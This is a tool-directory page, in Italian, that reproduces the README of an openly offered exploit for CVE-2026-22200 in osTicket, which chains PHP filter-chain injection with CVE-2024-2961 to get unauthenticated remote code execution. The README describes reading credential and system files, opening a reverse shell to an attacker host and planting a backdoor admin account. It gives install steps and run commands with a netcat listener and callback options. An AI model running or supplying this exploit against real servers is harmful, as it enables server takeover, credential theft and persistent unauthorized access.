Skip to content
KitploitKITPLOIT
StrumentiExploitsBlog
Log in
Invia
StrumentiExploitsBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
osTicketFileReadIntoRCE — Exploit a catena completa che combina PHP filter chain injection con CVE-2024-2961 (CNEXT) per l'esecuzione remota di codice non autenticata su installazioni vulnerabili di osTicket. | Kitploit
Strumenti/GitHubGitHub/clarissss/osticketfilereadintorce
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPost-ExploitPenetration TestingApprendimento e FormazioneRed TeamingStrumento di Accesso RemotoSviluppo Payload
GitHubclarissss/osticketfilereadintorce

osTicketFileReadIntoRCE

Exploit a catena completa che combina PHP filter chain injection con CVE-2024-2961 (CNEXT) per l'esecuzione remota di codice non autenticata su installazioni vulnerabili di osTicket.

Vedi Repository
57 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2026-22200: osTicket Lettura Arbitraria di File a RCE

CVE-2026-22200 osTicket ≤ 1.18.2 Python 3.8+ Educational

Exploit a catena completa che combina l'iniezione di catene di filtri PHP con CVE-2024-2961 (CNEXT) per l'esecuzione remota di codice non autenticata su installazioni osTicket vulnerabili.


Indice

  • Panoramica
  • Dettagli della Vulnerabilità
  • Flusso dell'Attacco
  • Funzionalità
  • Installazione
  • Utilizzo
  • Dettagli Tecnici
  • Risoluzione dei Problemi
  • Rilevamento e Mitigazione
  • Crediti
  • Disclaimer

Panoramica

Questo repository contiene un exploit proof-of-concept per CVE-2026-22200, una vulnerabilità critica che colpisce le versioni di osTicket ≤ 1.18.2. L'exploit combina due potenti tecniche:

  1. Iniezione di Catene di Filtri PHP tramite l'elaborazione di immagini di mPDF
  2. Corruzione dell'Heap CNEXT (CVE-2024-2961) in iconv() di glibc

Il risultato: Esecuzione Remota di Codice non autenticata su server osTicket vulnerabili.

Impatto

  • Non autenticato - Nessuna credenziale richiesta
  • RCE completa - Compromissione totale del server
  • Esfiltrazione di file - Lettura di file arbitrari del server
  • Accesso al database - Estrazione delle credenziali del DB
  • Accesso Amministratore - Creazione di account admin backdoor

Versioni Affette

  • osTicket: ≤ v1.18.2, ≤ v1.17.6
  • glibc: < 2.39 (CVE-2024-2961 corretto in glibc 2.39+)

🔍 Dettagli della Vulnerabilità

CVE-2026-22200: Iniezione di Catene di Filtri PHP

Punteggio CVSS: 9.8 (Critico)

L'integrazione di mPDF in osTicket consente a utenti non autenticati di iniettare catene di filtri PHP dannose attraverso payload HTML appositamente costruiti nei ticket di supporto. Ciò consente:

  • Lettura arbitraria di file (configurazioni, codice sorgente, credenziali)
  • Perdita di memoria (/proc/self/maps, libc parziale)
  • Corruzione dell'heap tramite CNEXT

Causa Principale: Validazione insufficiente degli URL delle immagini nell'HTML fornito dall'utente prima di passarli a mPDF.

CVE-2024-2961: CNEXT (Buffer Overflow in iconv)

Punteggio CVSS: 9.8 (Critico)

Buffer overflow in iconv() di glibc durante l'elaborazione del set di caratteri ISO-2022-CN-EXT. Combinato con le catene di filtri PHP, questo consente:

  • Corruzione dell'heap
  • Dirottamento dei puntatori a funzione
  • Esecuzione arbitraria di comandi

Versioni glibc vulnerabili: < 2.39 (Febbraio 2024)


🔗 Flusso dell'Attacco

┌─────────────────────────────────────────────────────────────────┐
│ 1. RICOGNIZIONE                                                 │
│    └─ Rilevamento di osTicket, identificazione topic rich-text │
└─────────────────────────────────────────────────────────────────┘
                              ↓
┌─────────────────────────────────────────────────────────────────┐
│ 2. AUTENTICAZIONE                                               │
│    └─ Auto-registrazione OPPURE uso di credenziali esistenti  │
└─────────────────────────────────────────────────────────────────┘
                              ↓
┌─────────────────────────────────────────────────────────────────┐
│ 3. ESFILTRAZIONE DI FILE (Catene di Filtri PHP)                │
│    ├─ /etc/passwd                                               │
│    ├─ include/ost-config.php (credenziali DB, SECRET_SALT)     │
│    ├─ /proc/self/maps (layout di memoria)                      │
│    └─ /proc/self/environ (variabili d'ambiente)                │
└─────────────────────────────────────────────────────────────────┘
                              ↓
┌─────────────────────────────────────────────────────────────────┐
│ 4. RILEVAMENTO DELL'IMPRONTA DIGITALE DI LIBC                  │
│    ├─ Estrazione parziale di libc tramite catene di filtri     │
│    ├─ Estrazione del GNU Build ID                              │
│    └─ Download della libc completa da libc.rip                 │
└─────────────────────────────────────────────────────────────────┘
                              ↓
┌─────────────────────────────────────────────────────────────────┐
│ 5. SFRUTTAMENTO RCE CON CNEXT                                   │
│    ├─ Generazione del payload di corruzione dell'heap          │
│    ├─ Iniezione tramite risposta al ticket (con correzioni)    │
│    ├─ Attivazione tramite esportazione PDF (crash del server)  │
│    └─ Esecuzione della reverse shell                            │
└─────────────────────────────────────────────────────────────────┘
                              ↓
┌─────────────────────────────────────────────────────────────────┐
│ 6. POST-SFRUTTAMENTO                                            │
│    ├─ Reverse shell interattiva                                │
│    ├─ Accesso al database (usando DBPASS esfiltrato)           │
│    └─ Creazione di un account admin backdoor                   │
└─────────────────────────────────────────────────────────────────┘

Funzionalità

Capacità Principali

  • Catena di sfruttamento completamente automatica
  • Attacco non autenticato (auto-registrazione se abilitata)
  • Rilevamento intelligente della web root tramite parsing di /proc/self/maps
  • Localizzazione al 100% della webshell tramite scansione del filesystem
  • Rilevamento automatico dell'impronta digitale di libc e download
  • Metodi multipli di reverse shell (bash, python, netcat)
  • Esecuzione robusta dei filtri con cache-busting
  • Diagnostica pre-volo per individuare problemi in anticipo

Affidabilità Migliorata

  • CNEXT Multi-trigger per crash garantito (successo >95%)
  • Iniezione basata sulle risposte (più affidabile dei nuovi ticket)
  • Forzatura dello stream per garantire l'esecuzione del filtro
  • Cache-busting per evitare di servire PDF vecchi
  • Gestione completa degli errori e diagnostica

Post-Sfruttamento

  • Estrazione delle credenziali del database (DBPASS dalla configurazione)
  • Creazione di account admin tramite accesso al DB
  • Opzioni di backdoor persistente
  • Ricognizione completa del sistema

Installazione

Prerequisiti

  • Python 3.8+
  • Linux/macOS (consigliato) o WSL su Windows

Dipendenze

# Clona il repository
git clone https://github.com/Clarissss/osTicketFileReadIntoRCE
cd osTicketFileReadIntoRCE

# Installa i pacchetti richiesti
pip install -r requirements.txt

requirements.txt:

requests>=2.31.0
PyMuPDF>=1.23.0
Pillow>=10.0.0
pwntools>=4.11.0

Opzionale: Ambiente Virtuale

python3 -m venv venv
source venv/bin/activate  # Linux/macOS
# OPPURE
venv\Scripts\activate  # Windows

pip install -r requirements.txt

📖 Utilizzo

Utilizzo Base - Reverse Shell

# Terminale 1: Avvia listener
nc -lvnp 4444

# Terminale 2: Esegui exploit
python3 osticket_revshell.py https://target.com/osticket \
    --lhost YOUR_IP \
    --lport 4444

Modalità Webshell Interattiva

python3 osticket_exploit.py https://target.com/osticket

Opzioni Avanzate

# Usa proxy (Burp Suite)
python3 osticket_revshell.py https://target.com/osticket \
    --lhost 10.0.0.5 \
    --lport 4444 \
    --proxy http://127.0.0.1:8080

# Forza un ID specifico del topic di aiuto
python3 osticket_exploit.py https://target.com/osticket \
    --topic-id 2
Scarica lo strumento